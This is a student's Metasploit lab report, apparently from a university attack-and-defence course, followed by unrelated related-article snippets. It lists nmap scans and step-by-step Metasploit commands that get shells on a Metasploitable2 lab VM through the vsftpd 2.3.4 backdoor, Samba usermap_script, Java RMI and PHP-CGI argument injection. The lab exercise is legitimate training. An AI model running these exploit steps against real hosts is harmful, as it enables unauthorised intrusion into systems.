20222411 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/11/18 21:07:58/文章来源:https://www.cnblogs.com/bestikk/p/18551684

1.实验内容

1.1 实践内容

(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

(4)Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

(5)PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

1.2 本周学习内容

(1)Metasploit:是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode。

(2)MST基本框架

(3)MST基本命令

use [auxiliary(辅助模块)&exploit(攻击模块)&payload(攻击载荷)&encode(编译器模块)]:指定设置的模块

show [exploits&payloads&encoder&auxiliary&options]:显示可使用的模块或选项

set [options&payload]:设定选项或模块(图失败,原因是32位设备,使用的64位exploit)

run&exploit:启用模块

back:取消当前指定模块,同时返回上级目录

info:查看这个模块的详情

search:搜索符合条件的模块

sessions:查看当前会话

2.实验过程

2.1前期渗透

2.1.1主机发现(可用Aux中的arp_sweep,search一下就可以use)

kali的ip地址为192.168.222.129

靶机的ip地址为192.168.222.146

输入msfconsol进入msf控制台

search arp_sweep
use 0
set RHOST 192.168.222.146(靶机ip地址)
exploit

可以看到主机存活

2.1.2端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

输入nmap 192.168.222.146

可以看到有很多tcp端口开放

2.1.3选做:也可以扫系统版本、漏洞等。

1.扫系统版本
输入nmap -O 192.168.222.146

可以看到系统版本是linux 2.6.x

2.2Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

利用步骤:

在kali中执行msfconsole 启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞

set RHOST 192.168.222.146 设置要攻击的机器IP(靶机IP)

exploit/run 开始攻击

利用成功
执行uname –a、 pwd、 id等命令 验证

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

利用步骤:

use exploit/multi/samba/usermap_script 选择漏洞

set RHOST 192.168.222.146 设置要攻击的机器IP

exploit 开始攻击

利用成功 执行uname –a验证

2.4Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

操作步骤:

首先查看1099端口是否打开。

输入nmap -p 1099 192.168.222.146

1099端口是开放的

然后在MSF中:
use exploit/multi/misc/java_rmi_server

set RHOST 192.168.222.146(靶机IP)

exploit/run

成功获取shell

使用dir验证

2.5PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

在kali中执行msfconsole,启动metasploit

use exploit/multi/http/php_cgi_arg_injection 选择漏洞

set RHOST 192.168.222.146 设置要攻击的机器IP

exploit/run 开始攻击

成功获取shell

输入dir测试

3.问题及解决方案

  • 问题1:使用arp_sweep模块时,没有设置目的ip地址,导致exploit错误

  • 问题1解决方案:输入set RHOST 192.168.222.146即可,以后使用模块时要输入options查看一下有什么选项是必须设置的

4.学习感悟、思考等

完成这个实验,我认识到MSF确实是一个很强大的工具,只要你的系统存在已知漏洞,只需在MSF工具里输短短几行代码就能将你的系统攻破。技术是一把双刃剑,我们要利用好MSF工具,将它用于安全领域进行网络安全保护,而不是滥用工具去攻击别人。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/836386.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何控制java虚拟线程的并发度?

jdk 21中的虚拟线程已经推出好一段时间了,确实很轻量,先来一段示例: 假如有一段提交订单的业务代码:1 public void submitOrder(Integer orderId) { 2 sleep(1000); 3 System.out.println("order:" + orderId + " is submitted");…

保险行业客户服务优化:客户运营知识库的实战应用

在保险行业,客户服务优化是提升客户满意度、增强企业竞争力的关键。客户运营知识库作为客户服务的重要支撑,其实战应用对于提升客户服务质量具有重要意义。本文将探讨保险行业客户服务优化的重要性、客户运营知识库的实战应用以及如何利用“HelpLook”工具实现客户服务优化。…

2024-11-18纯碱行情的解浪

图中蓝色线为调整浪ABC线 黄色线为5浪线 纯碱现在走的是ABC-C---->C-5---------5-4 总体来说是大级别的C浪,C浪的5浪,5浪的4浪回调,由于5浪的子2浪是都直的简单调整,5浪的一浪是启动三角形,趋势非常丝滑。这个5浪的子4浪会是大概率 的ABC调整,现在在走B浪还未完成,还…

2024-11-18 PVC分析

5182将是相当长时间的历史大底,这波不会破新低,以后N年也大概率不会破了。多头网格的好品种

ESP32蓝牙学习--蓝牙概念学习

前言 ESP32 是一款同时包含WIFI 蓝牙两者通信方式的芯片,之前学习过WIFI,这次学习一下其蓝牙功能,虽然之前有使用过其他的蓝牙芯片,但大多数都是使用应用层,很少去了解底层协议相关的知识,这一次从概念入手,细致了解一下蓝牙的相关概念,及ESP32相关的工程说明。 蓝牙的…

网络配置及进程-系统性能和计划任务

目录虚拟机联网 shell脚本实例 索引数组和关联数组,字符串处理,高级变量 进程管理 计划任务虚拟机联网 查看IP地址 #centos系列![root@localhost ~]# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.93.200 netmask 255.255.255.…

2024-11-18 大盘分析

牛市已经开始 首先上证季线级别4浪已经完美完成 本次上涨预计最高点位突破11000点再看商品市场 季线级别的3浪已经走完了前4浪,3-5已经启动,3浪的5浪 5of3 与3of3同样的强.3浪的上涨空间是100多一些,5浪可能 会更长。

【Project 2024软件下载与安装教程-亲测好用】

‌Project 2024的操作系统要求是Windows 10及以上版本‌。这意味着用户需要在Windows 10或更高版本的操作系统上安装和使用Project 2024‌1。 Project 2024是由Microsoft开发的一款高效实用的项目管理工具,旨在帮助项目经理发展计划、为任务分配资源、跟踪进度、管理预算和分析…

20222420 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222420 2024-2025-1 《网络与系统攻防技术》实验六实验报告 1.实验内容 (1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use) ②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等 ③选做:也可以扫系统版本、漏洞等。(2)Vsftpd源码包后门漏洞(…

Wincc 7.5SP2下VBA编程批量设置变量线性标定

继续学习wincc下面VBA编程,这个练习实现变量线性标定。 在前面练习基础上做,有REAL1至REAL10共10个变量,通过VBA脚本对Real1至Real5设置线性标定。 写下面的VBA脚本: Sub SetTagScaleParameter()Dim hmigo As hmigoDim strTagName As StringDim i As IntegerSet hmigo = N…

20222422 2024-2025-1 《网络与系统攻防技术》实验六实验报告

一、实验内容 本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。 https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 下载官方靶机Metasploitable2,完成下面实验内容。 用户名密码均为:msfadmin(1)前期渗透 ①主机发现(可用…